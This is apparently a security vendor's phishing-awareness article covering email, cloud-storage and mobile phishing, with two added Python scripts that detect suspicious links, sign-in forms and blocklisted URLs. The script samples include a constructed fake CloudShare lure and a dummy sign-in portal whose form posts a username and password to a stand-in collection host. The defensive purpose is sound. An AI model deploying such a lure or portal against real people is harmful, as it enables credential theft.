Phishing is among the most common and most effective attack vectors. It is a social engineering attack, typically used to steal user data such as login credentials and card numbers. The aim is to convince the victim that a message from the attacker contains something they want or need, a request from their bank, say, or a note from a colleague, so that they click a link, open an attachment or type in their details. Whatever the pretext, the attacker is after usernames, passwords and other account or financial data, or a foothold on the victim's machine.
With the right infrastructure in place, some reconnaissance on the target and a convincing lure, attackers can get into almost any company or organization, government agencies included, and do serious damage. The mechanics are simple. Once a victim has taken the bait and entered their details on a forged site, or sent them in reply to an email, the attacker uses those details for their own ends, most directly by logging in as the victim.
Phishing is not only highly common, but it’s arguably the most damaging and high-profile cybersecurity threat facing organizations today.
- Businesses are seeing more malicious emails flooding their inboxes. The volume of spam emails increased 4x in 2016. Source: IBM Threat Intelligence Index 2017
- Email is still the #1 delivery vehicle for most malware (just not ransomware). 1 in 131 emails contained malware in 2016, the highest rate in 5 years. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Fake invoice messages are the #1 type of phishing lure. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Apple IDs are the #1 target for credential theft emails. Source: Proofpoint 2017 Human Factor Report
- More than 400 businesses are targeted by business email compromise (BEC) scams every day. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Reports of W-2 phishing emails increased 870% in 2017. Source: IRS Return Integrity Compliance Services
- 76% of organizations reported being the victim of a phishing attack in 2016. Source: Wombat Security State of the Phish 2017
There are three common phishing vectors that you need to keep an eye out for:
1. Email Phishing:
From business executives to internet surfers at home, anyone who opens an unknown email and trusts its content is vulnerable to this classic manipulation tactic. Researchers at Symantec suggest that almost one in every 2,000 of these emails is a phishing email, meaning around 135 million phishing attacks are attempted every day. Most people simply don't have the time to carefully analyze every message that lands in their inbox and that's exactly what phishers are hoping to exploit in various ways.
How do you tell a genuine email from a phishing scam? The best defence is knowing the signs and staying vigilant. Check the URL before you trust it: hover over the link to reveal the real destination and compare the domain with the one you expect. Warning signs are a link whose visible text shows one address while the destination is another domain, a link to a bare IP address, and a brand name buried inside an unrelated domain (for example a "cloudshare.com" label sitting in front of some other domain). If anything looks even slightly off, do not click; reach the site by typing its address or using an existing bookmark instead.
2. Cloud Storage Phishing:
Cloud service providers such as Amazon, Google and Dropbox have become favourite targets for phishers. Typically the scammer sends an attachment or a link that asks the user to sign in to their cloud provider through a dummy portal, which captures the login details. Many of these campaigns carry lures (details added to make the phishing content look legitimate) saying that a document or picture has been shared with the victim and that they must sign in to view it. Because most of us trust the cloud implicitly with our personal data, stay alert when an unexpected "shared with you" notice arrives, and sign in by going to the provider's site directly rather than through the link.
3. Mobile Phishing:
More and more phishing scammers are shifting their attention to smartphones, where phishing content is harder to inspect and users are accustomed to tapping whatever notification arrives. In a mobile phishing attack the attacker usually sends an SMS message (often called smishing) containing a link to a phishing page or app which, once opened, asks for credentials.
Attacks can also arrive through email opened in the phone's browser, or through forged applications loaded with malware that capture personal information and trick users into handing over passwords. On a phone there is no mouse to hover with and the address bar truncates long URLs, so the link checks that work on a desktop are harder to apply; press and hold a link to preview its destination before opening it. Protect yourself by installing apps only from the official stores and reading their reviews before downloading, keeping security settings strict, and considering a reliable mobile security solution.
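The link checks described for email, the "document shared with you" lure and its dummy sign-in portal, and links delivered by SMS all come down to the same questions: where does the link really go, does the visible text agree with it, and where does the sign-in form send the credentials? The script below automates those checks. It is an added example, not code from the original article or from any vendor; the brand allow-list, the sample lure and the sample portal are constructed for illustration and the domains in them are fictitious.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress

# Brands the recipient really uses, mapped to the registrable domains those
# brands own. Assumption: loaded from an allow-list in practice; fictitious here.
KNOWN_BRANDS = {"cloudshare": {"cloudshare.com"}}

# Digit-for-letter substitutions common in look-alike hostnames (c1oudshare).
_HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s"})

class _Collector(HTMLParser):
    """Collect every <a href> with its visible text, and every <form action>."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []       # (href, text) pairs; action URLs
        self._href, self._text = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "form":
            self.forms.append(a.get("action") or "")
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def registrable_domain(host):
    """login.cloudshare.com -> cloudshare.com (simplification: multi-label
    public suffixes such as co.uk are not handled)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def lookalike_of(host):
    """Return the brand a hostname imitates, or None: the brand name appears in
    the host once digit substitutions and hyphens are folded away, yet the
    registrable domain is not one the brand owns."""
    folded = host.lower().translate(_HOMOGLYPHS).replace("-", "")
    for brand, legit in KNOWN_BRANDS.items():
        if brand in folded and registrable_domain(host) not in legit:
            return brand
    return None

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def inspect_html(html, page_host=None):
    """Return (finding, url) pairs for the links and forms in `html`. `page_host`
    is where the page was loaded from; it exposes a sign-in form that posts the
    credentials somewhere else."""
    c = _Collector()
    c.feed(html)
    findings = []
    for href, text in c.links:
        u = urlparse(href)
        if u.scheme not in ("http", "https"):
            continue                       # mailto:, javascript: etc. not covered
        host = u.hostname or ""
        if _is_ip(host):
            findings.append(("link to bare IP address", href))
        if any(label.startswith("xn--") for label in host.split(".")):
            findings.append(("internationalised (punycode) hostname", href))
        brand = lookalike_of(host)
        if brand:
            findings.append((f"hostname imitates {brand}", href))
        # Visible text that itself looks like a URL but names another domain:
        # what the user reads is not where the click goes.
        if "." in text and " " not in text:
            shown = urlparse(text if "://" in text else "http://" + text).hostname
            if shown and registrable_domain(shown) != registrable_domain(host):
                findings.append(("visible URL differs from real destination", href))
    for action in c.forms:
        u = urlparse(action)
        if u.scheme == "http":
            findings.append(("form submits over plain HTTP", action))
        if page_host and u.hostname and \
                registrable_domain(u.hostname) != registrable_domain(page_host):
            findings.append(("form posts to a different domain", action))
        brand = lookalike_of(u.hostname or page_host or "")
        if brand:
            findings.append((f"form host imitates {brand}", action))
    return findings

# Constructed samples (not a real campaign): a "document shared with you" lure
# as it might arrive by email or SMS, and the dummy sign-in portal it leads to.
SAMPLE_LURE = """
<p>A document has been shared with you on CloudShare.</p>
<p><a href="https://cloudshare.com.documents-view.net/open?id=42">https://cloudshare.com/open</a></p>
<p><a href="http://203.0.113.7/login">Sign in to view</a></p>
<p><a href="https://support.cloudshare.com/help">Help</a></p>
"""
SAMPLE_PORTAL = """
<h1>Sign in to CloudShare</h1>
<form action="http://collect.harvest-example.net/post.php" method="post">
  <input name="user"><input name="pass" type="password"></form>
"""

if __name__ == "__main__":
    for finding, url in inspect_html(SAMPLE_LURE):
        print("lure:   ", finding, "->", url)
    for finding, url in inspect_html(SAMPLE_PORTAL, "cloudshare.com.documents-view.net"):
        print("portal: ", finding, "->", url)
```

Run as-is, the lure produces three findings (the brand-in-subdomain link, its mismatched visible text, and the bare-IP link) while the genuine support link produces none, and the portal is flagged for posting credentials over plain HTTP to a domain other than the one the page was served from. The registrable-domain helper deliberately ignores multi-label public suffixes such as co.uk; a production version would use the Public Suffix List.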
Phishing has been around practically since the inception of the Internet, and it will not go away anytime soon, so it is worth becoming familiar with the best ways to avoid it. Here are some tips:
- Stay informed about phishing techniques. New phishing scams are being developed all the time. If you aren't staying on top of these new phishing techniques, you could inadvertently become a victim. Keep your eyes peeled for news about the latest phishing scams. By finding out about them as early as possible, you will be at a much lower risk of getting snared.
- Do not click on links, download files or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them and know exactly what they contain, even if you know the sender.
- Never email personal or financial information, even to someone you trust. You never know who may gain access to your email account, or to the recipient's.
- Never enter personal information in a pop-up window. A pop-up can be made to show any address, or none at all, so you cannot tell where your data is going; legitimate services ask for your details on a page whose URL you can see.
- Keep your browser updated. Security patches are routinely released for popular browsers. They are released in response to the security loopholes that phishers and other hackers inevitably discover and exploit. If you typically ignore messages about updating your browsers, put a stop to that habit. The minute an update is available, download and install it.
- Use your browser's anti-phishing protection. The older advice was to install an anti-phishing toolbar; today the major browsers ship this built in (Google Safe Browsing in Chrome, Firefox and Safari, Microsoft Defender SmartScreen in Edge), so make sure it is switched on. These checks compare the sites you visit against lists of known phishing sites and warn you before the page loads. It is one more free layer of protection, with one limit worth knowing: a site set up an hour ago is not on any list yet, so the habits above still matter.
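A sketch of the check behind such a list-based warning, as an added example that is not from the article or from any vendor's product: the visited URL is canonicalised first (case, credentials, port, fragment, percent-encoding and dot segments all removed), then matched against host-suffix/path-prefix expressions, because a plain string comparison is defeated by trivial rewrites of the same address. The blocklist entries and URLs are constructed, and the matching rules are a simplified version of what list-based services use, not any particular vendor's algorithm.

```python
from urllib.parse import urlparse, unquote
import ipaddress

# Constructed blocklist of canonical "host/path" expressions (fictitious sites):
# an entire domain, one directory on a host, and one exact page on a bare IP.
# Assumption: real lists are distributed as hashed prefixes, not plain strings.
BLOCKLIST = {
    "documents-view.net/",
    "evil.example/login/",
    "203.0.113.7/signin",
}

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def _canonical_path(raw):
    """Decode percent-escapes and resolve '.' and '..' so that /%6Cogin/ and
    /a/../login/ both become /login/."""
    segs = []
    for s in unquote(raw).split("/"):
        if s == "..":
            if segs:
                segs.pop()
        elif s not in ("", "."):
            segs.append(s)
    path = "/" + "/".join(segs)
    if raw.endswith("/") and segs:
        path += "/"
    return path

def canonicalize(url):
    """(host, path, query) with scheme, credentials, port, fragment and case
    differences removed. Blocklist entries must be canonicalised the same way."""
    url = url.strip()
    if "://" not in url:
        url = "http://" + url
    u = urlparse(url)
    host = (u.hostname or "").rstrip(".")        # .hostname is already lower-case
    return host, _canonical_path(u.path), u.query

def host_candidates(host):
    """The host and each parent domain down to the registrable domain, so a
    listing of documents-view.net/ also covers anything.documents-view.net."""
    if _is_ip(host):
        return [host]
    labels = host.split(".")
    return [".".join(labels[i:]) for i in range(max(1, len(labels) - 1))]

def path_candidates(path, query):
    """The exact path with and without its query, then every directory prefix,
    so a listing of /login/ also covers /login/reset."""
    out = [path + "?" + query] if query else []
    out.append(path)
    prefix = "/"
    out.append(prefix)
    for comp in path.split("/")[1:-1]:
        prefix += comp + "/"
        out.append(prefix)
    return list(dict.fromkeys(out))             # drop duplicates, keep order

def is_blocked(url, blocklist=BLOCKLIST):
    """True if any host-suffix/path-prefix combination of `url` is listed."""
    host, path, query = canonicalize(url)
    return any(h + p in blocklist
               for h in host_candidates(host)
               for p in path_candidates(path, query))

if __name__ == "__main__":
    for u in ["HTTPS://Cloudshare.Com.documents-view.net:443/a/../open?id=42#x",
              "http://user:pw@evil.example/%6Cogin/",
              "http://evil.example/loginx",
              "https://support.cloudshare.com/help"]:
        print("BLOCKED " if is_blocked(u) else "allowed ", u)
```

The first two sample URLs are caught only because of canonicalisation: the mixed case, explicit port, dot segment and fragment in the first, and the embedded credentials and percent-encoded path in the second, would all defeat an exact-string lookup. Real services additionally hash each candidate expression and let the browser look up hash prefixes, so the browser does not have to disclose every URL it visits, and they refresh the list continuously because a phishing site typically lives only hours.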
Nobody wants to fall prey to a phishing scam. There’s a good reason that such scams will continue, though: they're successful enough for cybercriminals to make massive profits. Fortunately, there are ways to avoid becoming a victim.
Protect your staff against cyber threats with Align Cybersecurity™ Security Awareness Training.
Align Cybersecurity offers tailored, nimble and advanced cybersecurity solutions encompassing Vulnerability Assessments / Penetration Testing, Cybersecurity Risk Management as a Service (Align Risk CSR), Customized Cybersecurity Programs, Third Party Management, Managed Threat Protection (Align Guardian), Cybersecurity Training and more.